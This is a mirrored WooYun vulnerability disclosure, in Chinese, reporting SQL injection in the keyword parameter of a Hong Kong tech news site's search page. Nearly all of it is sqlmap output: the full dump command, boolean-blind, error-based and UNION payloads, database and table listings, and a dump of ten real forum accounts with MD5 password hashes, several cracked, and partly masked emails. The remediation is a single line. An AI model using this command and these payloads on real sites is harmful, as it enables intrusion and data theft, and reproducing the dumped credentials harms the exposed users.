乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经主动忽略漏洞,细节向公众公开
ezone.hk (e-zone.com.hk)以全新面貌,提供一站式科技新聞,發布最新最熱的科技資訊、提供全面數碼情報,當中「新聞區」以科技、電腦、數碼及潮流新聞為主導。「討論區」讓網民討論熱門科技話題、吹水聊天、展現時下生活態度的分享平台;「提問區」讓網民互動交流 PC、DIGI 等四個範疇的科技知識,現已收藏近 20,000 條科技知識;「活動區」與多個機構媒體合辦或協辦各類活動及講座、提供業界的最新活動情報。
地址:http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag
$ python sqlmap.py -u "http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag" -p keyword --technique=BEU --random-agent --batch -D ez_discuz -T cdb_members -C username,password,email,credits,showemail,lastip --dump --start 1 --stop 10
| cdb_members | 124189 |
Database: ez_discuzTable: cdb_members[10 entries]+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+| username | password | email | credits | showemail | lastip |+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+| 系統管理員 | d68d9702b299ab9c529b8eae61f1bdb8 | lkjbnm5a6 | 216 | 0 | **.**.**.** || u00000004 | 4297f44b13955235245b2497399d7a93 (123123) | aeroplane@**.**.**.** | 0 | 0 | <blank> || u00000014 | e10adc3949ba59abbe56e057f20f883e (123456) | joe1@**.**.**.** | 0 | 0 | <blank> || u00000018 | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | fgfdsfs | 0 | 0 | <blank> || u00000020 | e10adc3949ba59abbe56e057f20f883e (123456) | pang@**.**.**.** | 0 | 0 | <blank> || u00000021 | 4297f44b13955235245b2497399d7a93 (123123) | mailaeroplane@**.**.**.** | 0 | 0 | <blank> || u00000024 | 4297f44b13955235245b2497399d7a93 (123123) | info@**.**.**.** | 0 | 0 | <blank> || pangpang | e10adc3949ba59abbe56e057f20f883e (123456) | cyp000@**.**.**.** | 3 | 0 | **.**.**.** || SuperBO | 596a96cc7bf9108cd896f33c44aedc8a (fuckyou) | larryleung@**.**.**.** | 1184 | 0 | **.**.**.** || u00000032 | e10adc3949ba59abbe56e057f20f883e (123456) | ezone1@**.**.**.** | 0 | 0 | <blank> |+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
Database: ezonedb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| visit_log | 1112444 || doc_questionnaire_reply_answer | 1016913 || cms_collect_log | 932428 |
---Parameter: keyword (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: keyword=-1516') OR 5718=5718#&op=tag Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: keyword=-8131') OR 1 GROUP BY CONCAT(0x7170767071,(SELECT (CASE WHEN (6844=6844) THEN 1 ELSE 0 END)),0x716a6b7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&op=tag Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F') UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x4261544b4854774a524e6d726e667146476e64645357576a666252586d6666587a4e64664b676459,0x716a6b7171),NULL#&op=tag---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0current user: 'ezuser@**.**.**.**'current user is DBA: Falsedatabase management system users [1]:[*] 'ezuser'@'**.**.**.**'Database: ez_discuz+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| cdb_posts | 384125 || cdb_threads | 271680 || cdb_memberfields | 124783 || cdb_members | 124189 || cdb_attachments | 66407 || cdb_mythreads | 58647 || cdb_threadtags | 57876 || cdb_tags | 14188 || cdb_pms | 7667 || cdb_onlinetime | 6350 || cdb_threadsmod | 2308 || cdb_modworks | 1597 || cdb_typeoptionvars | 1457 || cdb_myposts | 1368 || cdb_rsscaches | 1243 || cdb_favorites | 330 || cdb_polloptions | 295 || cdb_access | 284 || cdb_words | 251 || cdb_settings | 230 || cdb_buddys | 179 || cdb_statvars | 154 || cdb_stats | 136 || cdb_forumfields | 123 || cdb_forums | 123 || cdb_spacecaches | 122 || cdb_smilies | 98 || cdb_stylevars | 80 || cdb_typeoptions | 74 || cdb_threadtypes | 71 || cdb_ratelog | 69 || cdb_polls | 56 || cdb_moderators | 49 || cdb_banned | 46 || cdb_caches | 41 || cdb_faqs | 34 || cdb_usergroups | 17 || cdb_advertisements | 16 || cdb_crons | 13 || cdb_magics | 12 || cdb_projects | 12 || cdb_debateposts | 11 || cdb_medals | 10 || cdb_bbcodes | 9 || cdb_typevars | 9 || cdb_templates | 8 || cdb_pmsearchindex | 6 || cdb_ranks | 5 || cdb_admingroups | 4 || cdb_onlinelist | 4 || cdb_subscriptions | 4 || cdb_typemodels | 4 || cdb_imagetypes | 2 || cdb_styles | 2 || cdb_adminsessions | 1 || cdb_attachtypes | 1 || cdb_debates | 1 || cdb_failedlogins | 1 || cdb_plugins | 1 || cdb_promotions | 1 || cdb_sessions | 1 |+---------------------------------------+---------+Database: ezoneems+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| cms_campaign_queue_process | 118687 || cms_section_privilege | 129 || cms_selection | 80 || cms_campaign_job_entry | 33 || cms_campaign_job_entry_history | 25 || cms_campaign_job_entry_process | 25 || cms_campaign_queue_log | 25 || cms_section | 19 || cms_campaign | 14 || cms_m_ezone_job_entry | 13 || cms_record_content | 12 || cms_block_attachfile | 10 || cms_campaign_job | 9 || cms_campaign_job_stat | 8 || cms_m_ezone_job | 5 || cms_admin | 3 || cms_lang | 3 || cms_no_promote | 3 || cms_campaign_recipient | 2 || cms_usergroup | 2 || cms_campaign_default | 1 || cms_edn | 1 || cms_mail_bounce_back_pool | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 2840 || STATISTICS | 555 || TABLES | 269 || KEY_COLUMN_USAGE | 239 || TABLE_CONSTRAINTS | 221 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || SCHEMA_PRIVILEGES | 80 || CHARACTER_SETS | 36 || SCHEMATA | 5 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: ezonedb+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| visit_log | 1112444 || doc_questionnaire_reply_answer | 1016913 || cms_collect_log | 932428 || doc_jetso_reply | 862432 || doc_questionnaire_reply_answer_n | 821014 || doc_jetso_reply_new | 743044 || doc_element_description | 170907 || site_user | 128969 || site_user_new | 103638 || doc_element_image | 87079 || doc_questionnaire_reply | 72735 || doc_catalog_content | 60796 || doc_questionnaire_reply_new | 55566 || doc_tag | 48933 || site_document | 46368 || doc_image | 44882 || doc_channelnews_tag | 41445 || cms_news | 36010 || doc_element_title | 34605 || doc_voting_reply | 26049 || doc_tag_new | 25694 || doc_tips | 23788 || doc_event_session_reply | 22553 || doc_questionnaire_question_ans | 18177 || doc_event_session_reply_new | 17912 || site_document_0602 | 17849 || cms_weather_data | 12993 || doc_tips_new | 11966 || doc_upload | 11648 || doc_channelnews | 10087 || cms_comments | 10033 || hits | 7302 || doc_tips_reply | 5449 || doc_tips_reply_new | 5409 || doc_questionnaire_question | 3995 || doc_element_testphoto | 3965 || cms_source_linkage | 3313 || reply_hits | 2513 || doc_catalog | 2392 || doc_test | 2009 || doc_jetso | 1814 || doc_voting_answer | 1615 || cms_discuz_pool | 1498 || doc_banner | 1472 || cms_liveblog_post | 1403 || doc_forum_reply | 936 || doc_event | 736 || doc_jetso_announcement | 684 || doc_element_testvideo | 398 || doc_voting | 316 || doc_event_session | 286 || doc_questionnaire | 265 || doc_wallpaper | 265 || doc_forum | 191 || doc_program | 124 || sys_lookup | 71 || doc_element_video | 69 || doc_element_textarea | 66 || site_workplace | 52 || doc_element_video_link | 51 || site_application | 50 || cms_newsreportor | 38 || cms_subchannel | 34 || doc_index_layout | 34 || sys_applicationtype | 27 || doc_video | 23 || cms_meta | 13 || cms_navigation | 12 || cms_source | 12 || cms_category | 6 || doc_element_attachment | 6 || cms_liveblog | 5 || cms_usermanagement | 4 || doc_event_reply | 2 || doc_video_link | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: ez_discuzTable: cdb_members[1 column]+----------+----------+| Column | Type |+----------+----------+| password | char(32) |+----------+----------+Database: ez_discuzTable: cdb_forumfields[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(12) |+----------+-------------+Database: ezoneemsTable: cms_campaign[1 column]+----------------------+-------------+| Column | Type |+----------------------+-------------+| publicreportpassword | varchar(20) |+----------------------+-------------+Database: ezoneemsTable: cms_survey[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(20) |+----------+-------------+Database: ezoneemsTable: cms_member_record[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(100) |+----------+--------------+Database: ezoneemsTable: cms_campaign_job[1 column]+----------------------+-------------+| Column | Type |+----------------------+-------------+| publicreportpassword | varchar(20) |+----------------------+-------------+Database: ezoneemsTable: cms_mail_bounce_back_pool[1 column]+--------------+--------------+| Column | Type |+--------------+--------------+| poolpassword | varchar(255) |+--------------+--------------+Database: ezoneemsTable: cms_admin[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: ezonedbTable: site_user[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(200) |+----------+--------------+
Database: ez_discuzTable: cdb_members[46 columns]+--------------+-----------------------+| Column | Type |+--------------+-----------------------+| accessmasks | tinyint(1) || adminid | tinyint(1) || bday | date || credits | int(10) || customshow | tinyint(1) unsigned || dateformat | tinyint(1) || digestposts | smallint(6) unsigned || editormode | tinyint(1) unsigned || email | char(40) || extcredits1 | int(10) || extcredits2 | int(10) || extcredits3 | int(10) || extcredits4 | int(10) || extcredits5 | int(10) || extcredits6 | int(10) || extcredits7 | int(10) || extcredits8 | int(10) || extgroupids | char(20) || gender | tinyint(1) || groupexpiry | int(10) unsigned || groupid | smallint(6) unsigned || invisible | tinyint(1) || lastactivity | int(10) unsigned || lastip | char(15) || lastpost | int(10) unsigned || lastvisit | int(10) unsigned || newpm | tinyint(1) || newsletter | tinyint(1) || oltime | smallint(6) unsigned || pageviews | mediumint(8) unsigned || password | char(32) || pmsound | tinyint(1) || posts | mediumint(8) unsigned || ppp | tinyint(3) unsigned || regdate | int(10) unsigned || regip | char(15) || secques | char(8) || showemail | tinyint(1) || sigstatus | tinyint(1) || styleid | smallint(6) unsigned || timeformat | tinyint(1) || timeoffset | char(4) || tpp | tinyint(3) unsigned || uid | mediumint(8) unsigned || username | char(15) || xspacestatus | tinyint(1) |+--------------+-----------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: keyword (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: keyword=-1516') OR 5718=5718#&op=tag Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: keyword=-8131') OR 1 GROUP BY CONCAT(0x7170767071,(SELECT (CASE WHEN (6844=6844) THEN 1 ELSE 0 END)),0x716a6b7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&op=tag Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F') UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x4261544b4854774a524e6d726e667146476e64645357576a666252586d6666587a4e64664b676459,0x716a6b7171),NULL#&op=tag---web server operating system: Linux Red Hat Enterprise 5 (Tikanga)web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5Database: ez_discuzTable: cdb_members[10 entries]+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+| username | password | email | credits | showemail | lastip |+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+| 系統管理員 | d68d9702b299ab9c529b8eae61f1bdb8 | lkjbnm5a6 | 216 | 0 | **.**.**.** || u00000004 | 4297f44b13955235245b2497399d7a93 (123123) | aeroplane@**.**.**.** | 0 | 0 | <blank> || u00000014 | e10adc3949ba59abbe56e057f20f883e (123456) | joe1@**.**.**.** | 0 | 0 | <blank> || u00000018 | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | fgfdsfs | 0 | 0 | <blank> || u00000020 | e10adc3949ba59abbe56e057f20f883e (123456) | pang@**.**.**.** | 0 | 0 | <blank> || u00000021 | 4297f44b13955235245b2497399d7a93 (123123) | mailaeroplane@**.**.**.** | 0 | 0 | <blank> || u00000024 | 4297f44b13955235245b2497399d7a93 (123123) | info@**.**.**.** | 0 | 0 | <blank> || pangpang | e10adc3949ba59abbe56e057f20f883e (123456) | cyp000@**.**.**.** | 3 | 0 | **.**.**.** || SuperBO | 596a96cc7bf9108cd896f33c44aedc8a (fuckyou) | larryleung@**.**.**.** | 1184 | 0 | **.**.**.** || u00000032 | e10adc3949ba59abbe56e057f20f883e (123456) | ezone1@**.**.**.** | 0 | 0 | <blank> |+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
加过滤。
危害等级:无影响厂商忽略
忽略时间:2015-11-30 10:08
漏洞Rank:15 (WooYun评价)
暂无